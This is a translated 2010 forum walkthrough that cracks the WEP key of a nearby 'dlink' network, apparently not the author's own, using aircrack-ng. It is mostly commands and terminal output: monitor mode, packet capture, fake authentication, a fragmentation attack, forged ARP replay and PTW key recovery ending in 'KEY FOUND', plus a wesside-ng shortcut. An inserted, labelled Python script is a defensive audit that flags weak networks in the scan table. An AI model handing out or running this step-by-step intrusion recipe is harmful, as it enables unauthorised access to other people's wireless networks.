-------------------------------------------------------------------------------------------
(using aircrack-ng)
-------------------------------------------------------------------------------------------
2010.01.15
-------------------------------------------------------------------------------------------
tyro
-------------------------------------------------------------------------------------------
Note: the MAC addresses in this article have been altered; the title is purely to attract attention.
-----------------------------------------------------------------------------------------
The wireless card is:
0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)
Laptop model:
ins1420
--------------------------------------------------------------------------------------------------------
To download this article directly, run:
Code:
wget http://forum.ubuntu.org.cn/download/file.php?id=92758
--------------------------------------------------------------------------------------------------------
Full text begins:
1. Open a terminal and enter:
Code:
ifconfig
_______________________________
You get the following result:
[root@Archlinux ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1A:A0:FF:21:BF
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:17
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wlan0 Link encap:Ethernet HWaddr 00:1B:71:BD:69:CC
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:1078 errors:0 dropped:0 overruns:0 frame:0
TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:303752 (296.6 Kb) TX bytes:179166 (174.9 Kb)
________________________________
2. In the terminal, enter:
Code:
airmon-ng start wlan0
You get the following result:
[root@Archlinux ~]# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2013 NetworkManager
2017 wpa_supplicant
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)
3. In the terminal enter: kill 2013 2017  # kills the processes listed above that could cause trouble <# tested: you do not have to kill them; this step can be skipped>
4. modprobe iwl3945  # the wireless driver shown in the output above <# tested: can be skipped>
5. Open spoonwep and look up the channel of the wireless network you want to crack. After spoonwep starts, a scan window pops up automatically; the number under the column marked CH is the channel, usually 1, 6 or 11. What I scanned is shown below (only one example is given; in practice many networks show up). (This step is not required, because you will see your target anyway in the command-line output later.)
BSSID PWR Beacons #Data ,#/s CH MB ENC CIPHER AUTH ESSID
AP'S MAC -83 197+ 133+ 0 6 54e wep wep dlink
BSSID STATION PWR Rate Lost Packets Probes
AP’S MAC mac -43 11e-1e 22+- 2000+ dlink
<This is only an example; the values are not necessarily like this, and some of them change constantly>
# AP'S MAC: what I found here was 00:24:01:CO:08:F8 (the MAC address of the AP being cracked, i.e. the target)
# 197+ and 133+ mean these numbers keep increasing ## after the crack, when my roommate was using this network the Data count grew very fast, whereas before the crack it grew slowly; this spot will change later too
# The 6 under CH is the channel
# ENC is the encryption type; here it is WEP
# AUTH -> note that this changes later (I cannot explain the details myself; I am only a user)
# ESSID is the name of the wireless network (chosen by its owner)
————————————————
6. In the terminal:
Code:
airmon-ng start mon0 6
————————————————
···In step 2 the output said (monitor mode enabled on mon0); 6 is the channel number···
You get the following result:
[root@Archlinux ~]# airmon-ng start mon0 6
Process with PID 4162 (airodump-ng) is running on interface mon0
Process with PID 4170 (airodump-ng) is running on interface mon0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
mon0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon2)
mon1 Intel 3945ABG iwl3945 - [phy0]
7. Now start capturing packets (still in the terminal):
Enter in the terminal:
Code:
airodump-ng --ivs -w 333 -c 6 mon0
"333" can be any name you like (it is used later);
-c 6 fixes the channel to 6; mon0 is the interface enabled and listed above.
Note: from now on you see output similar to the spoonwep window you opened earlier. (Do not close this window.)
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:70:D2:0F:84 -1 0 0 34 12 158 -1 OPN <length: 0>
00:24:01:C0:0B:F8 -78 43 1108 1412 35 6 54e WEP WEP dlink
00:26:5A:AC:BC:D6 -83 20 871 0 0 6 54e WPA2 CCMP PSK 405
00:15:70:D2:0F:78 -84 0 92 13 0 6 54 OPN CMCC
00:1D:0F:7E:01:E4 -84 24 860 0 0 6 54 . WEP WEP FR10313
00:25:86:24:1F:86 -86 0 6 0 0 6 54 . WEP WEP F10-210
00:0E:E8:DB:33:EB -87 0 138 0 0 11 54 WPA TKIP PSK ipTIME
00:1B:2F:08:51:E6 -87 0 2 1 0 11 54 . WPA TKIP PSK NETGEAR
00:23:68:09:C9:CC -85 0 31 7 0 6 54 OPN CMCC
00:22:B0:91:64:19 -85 0 6 0 0 6 54 . WPA2 CCMP PSK Karas
00:27:19:9E:30:F6 -1 0 0 0 0 -1 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
00:15:70:D2:0F:84 00:1B:77:94:AD:04 -87 6-1 19 188 CMCC
(not associated) 00:22:FB:A4:DF:F4 -72 0-1 0 55
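As an added example (not part of the original post or of the aircrack-ng project), the following Python script parses the airodump-ng table shown above, using the column meanings explained in step 5, and lists every network that is still open, WEP-encrypted or WPA/TKIP. This is the inventory a network owner would run against their own site after reading a walkthrough like this one, since the WEP key below is recovered from a capture of only 17607 IVs. The sample input is the table from step 7 pasted inline; the class and function names are my own.

```python
import re
from dataclasses import dataclass

# Sample input: the airodump-ng screen from step 7 of the post, pasted inline.
SAMPLE = """\
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:70:D2:0F:84 -1 0 0 34 12 158 -1 OPN <length: 0>
00:24:01:C0:0B:F8 -78 43 1108 1412 35 6 54e WEP WEP dlink
00:26:5A:AC:BC:D6 -83 20 871 0 0 6 54e WPA2 CCMP PSK 405
00:15:70:D2:0F:78 -84 0 92 13 0 6 54 OPN CMCC
00:1D:0F:7E:01:E4 -84 24 860 0 0 6 54 . WEP WEP FR10313
00:25:86:24:1F:86 -86 0 6 0 0 6 54 . WEP WEP F10-210
00:0E:E8:DB:33:EB -87 0 138 0 0 11 54 WPA TKIP PSK ipTIME
00:1B:2F:08:51:E6 -87 0 2 1 0 11 54 . WPA TKIP PSK NETGEAR
00:23:68:09:C9:CC -85 0 31 7 0 6 54 OPN CMCC
00:22:B0:91:64:19 -85 0 6 0 0 6 54 . WPA2 CCMP PSK Karas
00:27:19:9E:30:F6 -1 0 0 0 0 -1 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
00:15:70:D2:0F:84 00:1B:77:94:AD:04 -87 6-1 19 188 CMCC
(not associated) 00:22:FB:A4:DF:F4 -72 0-1 0 55
"""

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
ENC_TYPES = ("OPN", "WEP", "WPA", "WPA2", "WPA3")


@dataclass
class Network:  # hypothetical record type, not an aircrack-ng structure
    bssid: str
    power: int
    beacons: int
    data: int      # the "#Data" column: captured data frames (IVs for WEP)
    channel: int
    mb: str
    enc: str       # "" when airodump-ng has not decoded a beacon yet
    cipher: str
    auth: str
    essid: str


def parse_airodump(text: str) -> list:
    """Parse the access-point table that airodump-ng prints on screen.

    Column order: BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID.
    CIPHER and AUTH are only present for some encryption types and the MB
    column may carry a detached "." (QoS flag), so each line is split into
    tokens and consumed left to right. Header rows and station rows (second
    token is a MAC) are skipped.
    """
    networks = []
    for line in text.splitlines():
        tok = line.split()
        if len(tok) < 9 or not MAC_RE.match(tok[0]) or MAC_RE.match(tok[1]):
            continue
        try:
            power, _rxq, beacons, data, _rate, channel = (int(t) for t in tok[1:7])
        except ValueError:
            continue  # not an access-point row
        mb = tok[7]
        i = 8
        if tok[i] == ".":
            i += 1  # detached QoS marker belonging to the MB column
        enc = cipher = auth = ""
        if i < len(tok) and tok[i] in ENC_TYPES:
            enc = tok[i]
            i += 1
            if enc == "WEP" and i < len(tok):
                cipher = tok[i]
                i += 1
                # AUTH is blank for WEP until airodump-ng learns it; a bare
                # ESSID literally named "OPN" or "SKA" would be misread here.
                if i < len(tok) and tok[i] in ("OPN", "SKA"):
                    auth = tok[i]
                    i += 1
            elif enc.startswith("WPA") and i + 1 < len(tok):
                cipher, auth = tok[i], tok[i + 1]
                i += 2
        essid = " ".join(tok[i:])  # hidden networks print as "<length: 0>"
        networks.append(Network(tok[0], power, beacons, data, channel, mb,
                                enc, cipher, auth, essid))
    return networks


def audit(networks: list) -> list:
    """Rate each network; returns (bssid, essid, enc, verdict) tuples."""
    findings = []
    for n in networks:
        if n.enc == "WEP":
            verdict = "WEP: key recoverable from captured IVs; migrate to WPA2/WPA3"
        elif n.enc == "OPN":
            verdict = "open: no encryption at all"
        elif n.enc == "WPA" or n.cipher == "TKIP":
            verdict = "WPA/TKIP: deprecated; move to WPA2-CCMP or WPA3"
        elif n.enc in ("WPA2", "WPA3"):
            verdict = "ok"
        else:
            verdict = "unknown: no beacon decoded yet, re-scan"
        findings.append((n.bssid, n.essid, n.enc, verdict))
    return findings


def weak_networks(networks: list) -> list:
    """Everything that is not rated ok, i.e. what an owner must fix."""
    return [f for f in audit(networks) if f[3] != "ok"]


if __name__ == "__main__":
    for bssid, essid, enc, verdict in weak_networks(parse_airodump(SAMPLE)):
        print(f"{bssid} {essid!r:14} {enc or '?':5} {verdict}")
```

Run against the sample it reports nine of the eleven access points as needing attention: three open, three WEP, two WPA/TKIP and one with no beacon decoded yet. Only the two WPA2-CCMP networks pass.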
8. In the terminal enter:
Code:
aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0
-a is followed by the AP's BSSID, i.e. the AP's MAC address
-h is followed by your own MAC address (reportedly a station's address can also be used)
You get the following result:
[root@Archlinux ~]# aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0
14:48:53 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
14:48:53 Sending Authentication Request (Open System) [ACK]
14:48:53 Authentication successful
14:48:53 Sending Association Request [ACK]
14:48:53 Association successful :-) (AID: 1)
At this point the window you left open, i.e. the airodump-ng window, (probably) changes noticeably.
If the change is obvious, then once the Data count has grown past 10000 you can run the following command directly to crack the key:
_______________________________________________________________________________
[root@Archlinux ~]# aircrack-ng -n 64 -b 002401C00BF8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 Ivs. (because I had closed the airodump-ng window once in between, which produced 333-02.ivs)
# Mine did not grow quickly (only 1412 IVs), so it failed here; continue below (it can still be cracked :-) haste makes waste!)
___________________________________________________________________________________
9.
Code:
aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0
15:07:10 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 5
15:07:11 mon0 is on channel 5, but the AP uses channel 6
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon1
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets...
Size: 328, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:24:01:C0:0B:F8
0x0000: 0842 0000 0100 5e7f fffa 0024 01c0 0bf8 .B....^...$....
0x0010: 0024 01c0 0bf8 d066 327e 0200 df2e 869e .$.....f2~......
0x0020: ec2f 54f3 1607 352f b790 45f2 414d 03c2 ./T...5/..E.AM..
0x0030: b9ad de4a 12c1 8da4 a3ad 0d02 801b 35d4 ...J..........5.
0x0040: 8911 ad85 e45f ac37 cfff f38b dc41 a600 ....._.7.....A..
0x0050: 5b21 01cf 9838 d95c d6ef bedc b898 7ec6 [!...8.\......~.
0x0060: 0491 4035 cf43 622d bdfb de72 6964 0299 ..@5.Cb-...rid..
0x0070: f2da f200 d5be c5c7 1a59 7e16 d081 078f .........Y~.....
0x0080: 8f26 3710 dce0 4cb9 5e32 f043 7108 672a .&7...L.^2.Cq.g*
0x0090: 3fa2 e3f9 e7fd ef46 1e3a d911 dc9a 2d1d ?......F.:....-.
0x00a0: 1fa0 598a a787 36a0 8e5e ead1 abb8 96b1 ..Y...6..^......
0x00b0: a6f8 6525 83f5 9b33 1dbd 3fcb b37c 3e2f ..e%...3..?..|>/
0x00c0: 9462 9146 d4a9 0ee9 600d 312d 9b44 b6bb .b.F....`.1-.D..
0x00d0: c5ec 2806 f1be 1b48 0a95 be99 d1c2 6928 ..(....H......i(
--- CUT ---
Use this packet ?
Now choose y
Use this packet ? y
Saving chosen packet in replay_src-0111-150843.cap
15:09:17 Data packet found!
15:09:17 Sending fragmented packet
15:09:19 No answer, repeating...
15:09:19 Trying a LLC NULL packet
15:09:19 Sending fragmented packet
15:09:20 No answer, repeating...
15:09:20 Sending fragmented packet
15:09:22 No answer, repeating...
15:09:22 Trying a LLC NULL packet
15:09:22 Sending fragmented packet
15:09:23 No answer, repeating...
15:09:23 Sending fragmented packet
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 384 bytes of a keystream
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 1500 bytes of a keystream
15:09:23 Got RELAYED packet!!
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[root@Archlinux ~]#
Note the key lines above:
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
After entering y the system starts sending data and the airodump-ng window reacts immediately: the Data count starts increasing at once, so the steps below are not necessary; once Data reaches 15000, use aircrack-ng to recover the password.
Otherwise, continue below:
10. Enter ls to see the names of the files just created, so they can be copied later :-) (not required)
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor
333-02.ivs Downloads replay_src-0111-150843.cap
[root@Archlinux ~]#
11. In the terminal enter:
Code:
packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w tyro
[root@Archlinux ~]# packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:71:BD:69:CC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w tyro
Wrote packet to: mrarp
12.
Code:
aireplay-ng -2 -r tyro -x 1024 mon1
mon1 (normally this should be mon0)
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets... (note: this is mon1 here)
[root@Archlinux ~]# aireplay-ng -2 -r tyro-x 1024 mon1
No source MAC (-h) specified. Using the device MAC (00:1B:71:BD:69:CC)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:1B:71:BD:69:CC
0x0000: 0841 0201 0024 01c0 0bf8 001b 77d8 630c .A...$......w.c.
0x0010: ffff ffff ffff 8001 437e 0200 769d a167 ........C~..v..g
0x0020: e1af 7926 ebca 352f b7cb 1002 53d7 59d3 ..y&..5/....S.Y.
0x0030: bb77 0e95 8732 d16a 2e18 0a49 0bd1 2acf .w...2.j...I..*.
0x0040: c256 37aa .V7.
Use this packet ?
Choose y
You get:
Saving chosen packet in replay_src-0111-151709.cap
You should also start airodump-ng to capture replies.
Now the Data count in the dump window climbs rapidly; do not close this window.
12. Open another terminal and enter:
ls
You get:
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor replay_src-0111-150843.cap
333-02.ivs Downloads mrarp replay_src-0111-151709.cap
[root@Archlinux ~]#
Enter in the terminal:
Code:
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs
…window, so ls shows two .ivs files)! (normally it should be 333-01.ivs)!
You get:
[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 IVs. (it failed because I had closed the airodump-ng window once at that point and then ran that command again, which produced a second ivs file)
[root@Archlinux ~]#
Code:
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs
Opening 333-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34551 ivs.
Aircrack-ng 1.0
[00:00:00] Tested 154 keys (got 17607 IVs)
KB depth byte(vote)
0 0/ 1 15(27136) 5A(23552) 7D(23040) A4(22784) A2(22528)
1 3/ 8 80(22272) E4(22272) 17(22016) 48(22016) 66(21760)
2 1/ 3 BE(23808) EE(23296) 1E(23040) 87(23040) 89(23040)
3 0/ 4 12(24832) 69(23552) 5B(23296) D0(23296) AE(23040)
4 0/ 2 06(24064) 7F(23296) AE(22272) 69(22016) DE(22016)
KEY FOUND! [ 15:80:59:12:06 ]
# Remove the colons: that is the password!!!
Decrypted correctly: 100%
[root@Archlinux ~]#
Here is the password. 8)
Decrypted = cracked
---------------------------------------------------------------------------------------------------------------------------
13. Since making it this far was not easy:
here is the best method (not that great either):
Open the spoonwep client and find the MAC address and channel of the target.
Enter the following command in the terminal:
Code:
wesside-ng -i mon0 -v <target MAC>
Code:
sudo airmon-ng stop mon0